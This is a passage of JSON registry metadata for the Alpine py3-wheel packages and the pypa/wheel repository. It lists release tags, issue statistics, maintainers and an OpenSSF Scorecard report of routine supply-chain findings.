30.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:25.909Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.21","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":93,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2024-12-13T17:52:10.758Z","updated_at":"2024-12-13T17:52:10.758Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.21","url":"https://pkgs.alpinelinux.org/packages?branch=v3.21","ecosystem":"alpine","default":false,"packages_count":25393,"maintainers_count":413,"namespaces_count":2,"keywords_count":3612,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1270},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-12-06T12:06:36.014Z","updated_at":"2026-06-10T05:18:33.774Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/namespaces"}},{"id":11124392,"name":"py3-wheel-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-wheel","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2024-07-28T21:47:40.000Z","latest_release_published_at":"2024-07-28T21:47:40.000Z","latest_release_number":"0.43.0-r0","last_synced_at":"2026-03-05T07:03:47.094Z","created_at":"2024-12-07T06:16:19.876Z","updated_at":"2026-03-05T07:03:47.094Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.21/main/x86_64/py3-wheel-pyc","install_command":"apk add py3-wheel-pyc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed 